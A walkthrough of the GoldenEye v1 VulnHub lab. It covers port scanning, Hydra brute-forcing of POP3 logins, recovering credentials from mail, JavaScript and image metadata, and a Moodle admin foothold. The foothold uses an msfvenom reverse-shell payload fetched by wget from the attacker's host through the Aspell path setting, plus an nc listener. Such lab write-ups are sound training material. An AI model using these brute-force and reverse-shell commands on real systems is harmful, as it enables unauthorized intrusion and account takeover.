GoldenEYEv1 || VulnHub Walkthrough


Hello everyone! Welcome to my latest video. Today, we'll be exploring a vulnerable machine called " GoldenEye," classified as " Intermediate " in terms of difficulty.

This machine is inspired by the iconic James Bond film (and even better N64 game) GoldenEye. Our objective is to gain root access and capture the secret GoldenEye codes in the flag.txt file. 


To get started, visit the VulnHub website and download the vulnerable image. If you're new to VulnHub, check out our VulnHub playlist for some helpful tutorials.

Vulhub: Vulnerable By Design

Vulhub provides a collection of pre-built vulnerable environments. This resource is designed to help you practice penetration testing and vulnerability assessment skills on a variety of systems.



Settings Up

Once you've downloaded the image, the next step is setting up the server in VirtualBox. 

This process is quite simple and involves importing the OVA file into VirtualBox using the " import appliance " feature. Importing the OVA file into VirtualBox is a straightforward process. Here's how to do it:

To import an OVA image, navigate to the menu bar and click on " File ". From the dropdown menu, select " Import Appliance ".

This will open the "Appliance to Import" window, where you can browse and select the OVA image from your local storage. 

Click " Next," and the " Appliance Settings " window will appear. Now, review the appliance details and settings.

You can adjust them as needed. Click "Finish" to start the import. Once the import is finished, you'll see the "GoldenEye-v1 " vulnerable machine listed in the VirtualBox Manager under the VulnHub group. 

Select the virtual machine, go to " Settings," and change the network adapter to " Host-only adapter ."

It's important to ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, so make sure they're both connected via the host-only adapter. 

Now, it’s time to start the VM, and you'll notice that our Vulnerable Machine is ready, with a login prompt awaiting. 

Let's dive into the fun!


Enumeration

Identify the IP address

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using NetDiscover. To execute this, open a terminal and run "netdiscover -i" followed by specifying the network interface name, which in this case is "eth1 ."

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.125.0/16   |   Screen View: Unique Hosts                                                 
                                                                                                                      
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                      
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:0d      1      60  Unknown vendor                                                     
 192.168.95.2    08:00:27:fc:8a:4c      1      60  PCS Systemtechnik GmbH                                             
  192.168.95.19   08:00:27:70:49:72      1      60  PCS Systemtechnik GmbH   

From the scan results, we've obtained our target IP address: " 192.168.95.19 ."


Scan the Network to identify open ports

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular N map tool for this task. Run the following command:

nmap -sC -sV {Specify the IP address}

In this command, 

  • " -sC " is used to perform a script scan using the default set of scripts, 
  • while " -sV " enables version detection, allowing us to identify which versions are running on which port.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 19:52 IST
Nmap scan report for 192.168.95.19
Host is up (0.00091s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.10 seconds
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$

After completing the network scan, we discovered two open ports:

  • Port 25/TCP: This port is commonly used for the Simple Mail Transfer Protocol (SMTP) . The scan identified the service version as " Postfix smtpd " and detected features such as PIPELINING, which allows multiple commands to be sent without waiting for responses, the ability to send large emails, and TLS encryption for secure communication.
  • Port 80/TCP: This port is commonly used for HTTP web traffic. The scan identified the service version as " Apache httpd 2.4.7 ((Ubuntu)) " and found the web server title to be "GoldenEye Primary Admin Server". This indicates that the server is running on Ubuntu and is labeled as the " GoldenEye Primary Admin Server ".


Web Enumeration

Now, let's explore the content of the website running on Port 80. To look at the contents ourselves, open a web browser of your choice, and navigate to the target’s IP address in the URL bar at the top of the window.

Upon exploring the webpage, it appears to be a " Severnaya Auxiliary Control Station," suggesting it might be a control panel for a system named " Severnaya ."

The login page displays a warning: "TOP SECRET ACCESS" and provides server details: 

  • Server Name: GoldenEye
  • User: Unknown.

The login page instructs users to navigate to " /sev-home/ " to proceed. Let's see what awaits us there.

Upon navigating to " /sev-home/ ", we encounter a login prompt requesting a username and password. Unfortunately, we lack the necessary credentials to proceed, so our first priority is to find the credentials.

Since brute-forcing credentials is not recommended, let's explore alternative methods. We can use the browser's developer tools to gain insights into the login page. By right-clicking anywhere on the page and selecting " View Page Source," we can access the underlying HTML code.

Within the source code, we discover a JavaScript file named, " terminal.js " embedded within a script tag. This file might contain valuable clues for our investigation.

Let's examine the contents of " terminal.js " to see if the developer left any hints for authorized access.

Our inspection of the JavaScript file reveals an interesting piece of information embedded within the code. While we won't disclose the exact details here, it appears the developer intended to provide a hint for a legitimate user, Boris, and encoded a password in the script.

It seems Boris is the username, and the encoded text looks like the password. Since it is encoded, let's search for it on Google. While searching, the text automatically decodes to “ InvincibleHack3r ”. 

For better verification, we can use an online HTML entity encoder/decoder, which confirms the same result.

HTML Entities Encoder/Decoder

Mother Effin' HTML Encoder/Decoder helps you convert characters to their corresponding HTML entities, making it easier to work with HTML and ensure your code displays correctly.


Now that, we have a valid username and password, it’s time to log in as we had attempted earlier. 

Upon accessing, it shows the description of GoldenEye.

GoldenEye is a Top-secret Soviet orbital weapons project . Since you have access, you definitely hold Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO). Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system.

Remember, since security by obscurity is very effective, we have configured our POP3 service to run on a very high non-default port.

Upon analyzing the description, it mentions that the POP3 service is running on non-default high ports. Use this information to locate and access the POP3 service, which can help in gaining a foothold in the server. 


Scan the Network to find the pop3 service

To get to know, if there is a pop3 service running, we can again conduct a network scan to identify open ports using nmap. Here, I am using going to scan all open ports.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.19 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 21:31 IST
Nmap scan report for 192.168.95.19
Host is up (0.0017s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) PIPELINING USER AUTH-RESP-CODE UIDL CAPA TOP RESP-CODES
55007/tcp open  pop3     Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES SASL(PLAIN) PIPELINING UIDL USER CAPA TOP STLS
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.12 seconds
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Upon completion of the network scan, we discovered two open ports.

  • 55006/TCP: This port is open and uses the TCP (Transmission Control Protocol) for communication.  TCP is a reliable protocol that ensures data arrives in order and without errors.
  • 55007/TCP: Similar to the first port, this is another open TCP port associated with the POP3 service.

Both ports seem to be running the POP3 (Post Office Protocol) service, likely via the Dovecot mail server software.

POP3 is a standard protocol used to download emails from a mail server to a local email client (like Thunderbird or Outlook) . It typically uses port 110 , but in this case, it's running on non-standard ports (55006 and 55007) .


User Enumeration for POP3 Service: Targeting User 'Boris

Since the POP3 service is running, it means, we can establish a connection to view the emails exchanged between various users. For this purpose, we can use the Telnet client tool.  Here’s how to proceed:

Open your terminal and type the following command:

telnet {IP Address} {Target POP3 Port}

In this case, we will first attempt to connect on port 55006 and use the previously found credentials:

  • username:  Boris  
  • password:  InvinsibleHack3r

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55006
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
USER boris
Connection closed by foreign host.
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Unfortunately, the connection is closed by the foreign host, which indicates that port 55006 is not usable. 

We have another open port 55007, so we will use this one to establish a connection.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System

Upon successfully connecting to port 55007, the server displays a “ +OK ” confirmation, indicating that we have accessed the GoldenEye POP3 Electronic-Mail System.

USER boris
+OK

Upon inputting the username Boris, The server responds with +OK, confirming that the username is valid. Next, input the password InvinsibleHack3r

PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.

But, the server responds with -ERR [Auth] Authentication failed, indicating that the password is invalid for the username Boris.

Since we do not have a valid username, let’s conduct a password attack on the POP3 service running on the target machine for the user, Boris. For this purpose, we will use Hydra, a powerful tool for brute force attacks.

hydra -l <specify the username> -P <path-to-wordlist> -f {Target Host IP} -s <Port> <specify the Protocols to attack> -t  <specify number of tasks>

Where:

  • -l is used to specify the known username to use, that is, Boris.
  • -P is used to specify the path to the wordlist file ( fasttrack.txt ) containing potential passwords.
  • -f is used to tell Hydra to stop after finding the first valid login.
  • Specify the IP address of the target, 192.168.95.19.
  • -S is used to specify the port number, which is 55007. 
  • Specify the protocol to attack , which is POP3.
  • Use the -t flag to specify a higher number of tasks.  Because there is a higher chance of the POP3 server disconnecting the Hydra client due to inactivity during the authentication process. This likely means that the server has a timeout setting that disconnects idle connections during login attempts. To address the inactivity disconnections, we can try to Increase the Task Number. Increase the number of parallel tasks to speed up the process and reduce inactivity periods.

┌──(kali㉿kali)-[~]
└─$ hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.95.19 -s 55007 pop3 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 22:49:01
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 262 login tries (l:1/p:262), ~14 tries per task
[DATA] attacking pop3://192.168.95.19:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 162 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.95.19   login: boris   password: secret1!
[STATUS] attack finished for 192.168.95.19 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-24 22:51:39
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$

By increasing the number of parallel tasks and using immediate execution mode, Hydra successfully finds a valid password for the user Boris for the POP3 service.

Now that we have the password, let's continue to establish the POP3 connection, which was previously disrupted due to the lack of a valid password.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.

Upon inputting the password, the server responds with +OK Logged in . This indicates that we have successfully logged in to the POP3 service.

Now, it’s time to retrieve the mail. To retrieve the emails, run the LIST command. 

LIST
+OK 3 messages:
1 544
2 373
3 921
.

The server responds with +OK 3 messages, indicating that there are three messages available.

To read the content of any of these messages, run the RETR command followed by the sequence number of the message.

RETR 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.

The RETR 1 command retrieves the first email, which includes headers and body content. Upon analysing the admin’s statement, I figure it out a Potential Security Weakness.

The admin's statement about not scanning emails for security risks highlights a potential vulnerability. This could be exploited to communicate sensitive information without detection, posing a security risk.

Let's proceed with further actions by retrieving additional emails to gather more information. Analyze the contents of other emails for any actionable intelligence or further security insights.

RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.

The retrieved email contains a concise message: 

" Boris, I can break your codes!

This statement suggests that the sender, identified as natalya@ubuntu , claims the capability or intention to decrypt Boris's codes.


User Enumeration for POP3 Service: Targeting User 'Natalya'

Upon reviewing the emails, while no immediate valuable information was found, it became apparent that Natalya appears to be another username associated with the system.

Since we have identified the username natalya but lack the corresponding password, the next logical step is to attempt a password attack using Hydra.

┌──(kali㉿kali)-[~]
└─$ hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.95.19 -s 55007 pop3 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 22:58:00
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 262 login tries (l:1/p:262), ~14 tries per task
[DATA] attacking pop3://192.168.95.19:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 162 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.95.19   login: natalya   password: bird
[STATUS] attack finished for 192.168.95.19 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-24 23:00:17
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Hydra successfully cracked the password for Natalya on the POP3 service. The password Found is: bird. The successful cracking of the password ( bird ) for natalya grants unauthorized access to the POP3 service.

Since we have another valid username and password let’s establish a connection against POP3.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007                       
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.

Log-in was successful. Now, it’s time to retrieve the mail. To retrieve the emails, run the LIST command. 

LIST
+OK 2 messages:
1 631
2 1048
.

The server responds with +OK 2 messages , indicating that there are 2 messages available.

To read the content of these messages, run the RETR command followed by the sequence number of the message.

RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.

The RETR 1 command retrieves the first email.

The email reveals internal communications within the system, addressing specific roles and responsibilities. Mention of attempting to break Boris' codes and caution about network breaches suggests ongoing security risks and concerns. The content highlights operational directives and alerts intended to manage and mitigate potential security threats.

This analysis provides insights into the operational dynamics and security posture within the GoldenEye system. It underscores the importance of monitoring and securing network operations, especially in light of external threats like the Janus crime syndicate. Further actions may involve implementing enhanced security measures and vigilance to safeguard sensitive information and maintain operational integrity.


Let's retrieve and analyze the 2nd message from Natalya's mailbox. 

RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

This email contains essential information about operational procedures and security practices.

  • The email outlines the steps for managing new user accounts and highlights the importance of reporting system configuration issues, particularly those related to security. This proactive approach helps maintain system integrity.
  • The email provides access credentials for a new user, Xenia. Boris has verified Xenia as a valid contractor, authorizing the creation of her account.
  • Natalya is given an internal URL ( severnaya-station.com/gnocertdir ) and instructed to update her hosts' file to access it. This URL is likely essential for her training and operational tasks.
  • Since Natalya uses a Linux environment, she is instructed to point the server's IP to severnaya-station.com in the /etc/hosts file to ensure proper access to the internal domain.

From the analysis of the message, first, we have to Update the Hosts File:

To access the internal URL, we need to modify our system's /etc/hosts file to map the target’s IP address to severnaya-station.com .  Open the /etc/hosts file in a text editor with root permissions and Add the following line to map the target's IP address to severnaya-station.com.

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts

Once the "hosts" file is updated, we can visit the internal URL to proceed with any necessary tasks or further investigations. 

On the web browser, navigate to http://severnaya-station.com/gnocertdir.

Upon navigating to the internal URL, we see the dashboard for " GoldenEye Operators Training-Moodle ". This page displays available courses and other relevant information.


In the upper left corner, you will find a login button. Click on the login button. 

Upon clicking the " Log in " button, it will be redirected to a login area. Here, you can either log in using valid credentials (username and password) or opt to log in as a guest if that option is available.

In our previous steps, we discovered the username and password needed to access the system. Let's use these credentials to log in and explore further. Input the username and password found earlier. 

Upon successful login, the webpage will display the GoldenEye operator training portal.

Upon logging into the training portal, you will see the following features:

Here, 

  • it displays a welcoming message that greets you on the main page. 
  • A calendar component is displayed on the right side of the page, and a navigation menu on the left side provides links to various sections of the training portal.
  • This menu provides links to various sections of the training portal, including, Home, My Courses, My Profile, Settings, and My Messages.
  • Also, we found logout button in the top right corner allows you to log out of the training portal, where the username " Xenia " is displayed in the top right corner, indicating who is currently logged in.
  • A new message notification is present from Dr. Doak. Clicking on this might display the message content.

Based on the elements visible, we can infer that this webpage is a portal for GoldenEye operator training. It provides a central location for trainees to access course materials, manage their profiles, and communicate with instructors or other trainees.


To open the inbox, Go to " My Profile " in the navigation menu and click on " Messages ". Upon clicking on " Messages," an unread message from Dr. Doak is displayed. 

Click on it to read the content. The message from Dr. Doak provides a hint: 

His email username is: " Doak ."


User Enumeration for POP3 Service: Targeting User 'Doak'

With the username " doak " discovered, we can attempt a password attack against the POP3 service using Hydra. Run Hydra, to perform a password attack on the POP3 service for the user " doak ". 

┌──(kali㉿kali)-[~]
└─$ hydra -l doak -P /usr/share/wordlists/fasttrack.txt -s 55007 -f -t 20 192.168.95.19 pop3                        
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 23:33:53
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 262 login tries (l:1/p:262), ~14 tries per task
[DATA] attacking pop3://192.168.95.19:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 162 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.95.19   login: doak   password: goat
[STATUS] attack finished for 192.168.95.19 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-24 23:36:12
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Hydra finds that the password for "doak" is: " goat ." Let’s use it to establish a POP3 connection to check if there are any messages are there using telnet.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.

Run the LIST command to see if there are any messages. 

LIST
+OK 1 messages:
1 606
.

The server responds with +OK 1 message , indicating there is one message. Let’s retrieve the message using the RETR command.

RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

The message from Doak contains important information: it includes the username and password. These credentials could be valuable for gaining further access.

With the credentials provided in Doak's message, we can attempt to log in. First, let me log out from the previous session. Use the username and password provided in Doak's message to log in. Upon a successful login attempt, a similar dashboard to the one seen before appears.


Now, let's find out if there are any clues left for further escalation.

Upon Navigating to " My Profile " in the navigation menu and clicking on the dropdown menu, it displays various options. One of these options, " My Private Files," looks particularly interesting.

Select " My Private Files " to look for any files that might provide further clues or information. In the directory, there's a folder named " for James ."  Click on that directory. Upon doing so, a text file named " s3cret.txt " appears. 

This text file could contain important information that may lead us to further escalation. When you click on the file, it automatically starts to download.

The contents of the file " s3cret.txt " provide several clues that may lead to further escalation:

  • The text mentions that admin credentials were captured in clear text but cannot be added directly to the file due to security scans on web apps within the GoldenEye servers and the message also directs attention to a file located at /dir007key/for-007.jpg . This location likely contains valuable information or resources.
  • There is also a comment about the RCP-90 weapon and "License to Kill," which seems more like a personal note rather than a clue for escalation.

Investigate Images to find a clue

Next, we need to access the file. To do this, navigate to the specified directory /dir007key/ after the URL http://192.168.95.19 and locate the file for-007.jpg .

I found an image there, so let's examine its contents for any embedded data or further clues. First, we need to download it. We can use the wget tool for this purpose.

┌──(kali㉿kali)-[~]
└─$ wget http://192.168.95.19/dir007key/for-007.jpg
--2024-05-24 23:44:18--  http://192.168.95.19/dir007key/for-007.jpg
Connecting to 192.168.95.19:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’

for-007.jpg                   100%[================================================>]  14.55K  --.-KB/s    in 0s      

2024-05-24 23:44:18 (752 MB/s) - ‘for-007.jpg’ saved [14896/14896]

                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Next, let's investigate the image using exiftool

┌──(kali㉿kali)-[~]
└─$ exiftool for-007.jpg
ExifTool Version Number         : 12.76
File Name                       : for-007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2018:04:25 06:10:02+05:30
File Access Date/Time           : 2024:05:24 23:44:28+05:30
File Inode Change Date/Time     : 2024:05:24 23:44:18+05:30
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$

Analyzing the file for-007.jpg with exiftool reveals several key pieces of metadata. One specific piece of data stood out: encoded text in the " Image Description " field. The value in the " Image Description " field appears to be in base64 format.

Let's decode it. Using the base64 -d command to decode this value results in the string. 

┌──(kali㉿kali)-[~]
└─$ echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

This decoded string is likely a password or a key phrase. 

  • Username: Admin
  • Password: xWinter1995x!

Finally, let's use this credential to log in as admin. Using the decoded string, we successfully log in as admin. 

We have successfully logged in as admin. Since we have access to the admin dashboard, let's look for an area where we can upload or inject a reverse shell script to gain a foothold on the server.


Foothold

While navigating through various sections, I came across a critical area labeled " System path " under Site Administration on the server. 

This section pertains to the configuration page within Moodle, specifically focusing on settings related to system paths.

Let's examine each section to understand how we can use it to gain a reverse shell. To understand how to execute a reverse shell, I explored each section within the Moodle instance. I found a particularly interesting feature that allows inputting shell commands into fields designed for specifying the path to the Aspell utility

Aspell is commonly used for spell-checking within the text editor.


Gain a Reverse shell using the Aspell Spell-checking tool

According to the tooltip, the default path for Aspell is typically /usr/bin/aspell , but this can vary depending on the server's configuration. It's crucial to specify the correct path for the spell-checking functionality to operate effectively.

After reviewing the details, I devised a method to initiate a reverse shell. 

This involves creating a reverse shell file and crafting a command that will download and execute it on the server. By clicking on the Spell check function within the Moodle interface, the crafted command aims to trigger a reverse shell, establishing a connection back to a listener set up for this purpose.

So, we need to craft a PHP reverse perl To create a PHP Reverse perl shell payload, we will use MSF venom . On the terminal, run the following command:

msfvenom -p <Path of the payload> lhost= <Local Host IP> lport= <Port> -f raw -o <Path-to-save>

Where, 

  • -p is used to specify the payload type, that is, PHP reverse Perl , which creates a PHP script that establishes a reverse Perl shell.
  • The lhost is used to set the local host IP address (your Kali Linux machine's IP) which the reverse shell will connect back to. 
  • lport is used to set the local port on which the reverse shell will communicate.
  • The -f raw is used to specify the output format as raw, which outputs the payload in its raw form, and 
  • the -o is used to specify the output file location and name where the generated PHP script will be saved.

┌──(kali㉿kali)-[~]
└─$ msfvenom -p php/reverse_perl lhost=192.168.95.3 lport=4444 -f raw -o /home/kali/reverse.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1880 bytes
Saved as: /home/kali/reverse.php
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Upon execution, the payload was successfully generated and saved as reverse.php in the /home/kali directory, which can be confirmed using the ls command.

┌──(kali㉿kali)-[~]
└─$ ls   
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  for-007.jpg  reverse.php
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$

Next, we start a Python HTTP server. This command serves the current directory on port 8000 of our Kali Linux machine.

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

This server allows us to host files locally, making them accessible via HTTP. Now, let’s craft the shell command. Where this command downloads the reverse.php file and saves it to the /tmp directory, and then it will execute using the php command.

sh -c '(wget http://192.168.95.3:8000/reverse.php -O /tmp/reverse.php && php /tmp/reverse.php)'

Before we proceed further, let me start a listener using Netcat. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

Paste the crafted command in the aspell path and click on “ Save changes ”. 

To execute the command, find the aspell path, which can be found in " Edit course " or " Create a New course ". Navigate to courses, then GNO, then Intro.

Because Editing is off, we cannot edit any file. So, click on Turn editing off to on. 

Now, editing is possible, so click on any of these.


It will provide an area where we modify the content. Most importantly, " Toggle Spell Checker ".

Alternatively, we can “ Add a new entry ” by navigating to “ Site blog ” found in “ Site pages ”. Click on “ Add a new entry ”, which will provide an area where you can write your blog.

Add some input for general purposes, and Click on " Toggle spell checker " to check if the spell checker is functioning correctly.

However, after clicking " Toggle spell checker," we noticed that a reverse shell connection to our listener was not established. 

To resolve this issue, we need to identify the problem. Navigate to " Site administration " and then to " Plugins ." Under " Text-editor plugins," locate the " TinyMCE HTML editor ."

Upon inspecting the settings, we discovered that the spell checker engine was set to Google Spell. This means that when the " Toggle spell checker " is clicked, it uses the Google Spell Check engine instead of Aspell, which is required for our reverse shell to work.


To fix this, change the spell checker engine from the dropdown menu to " PSpell Shell ." Return to the " Site blog " where you add a new entry. Click on " Toggle spell checker " again.

Now, we should successfully establish a foothold on the server.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
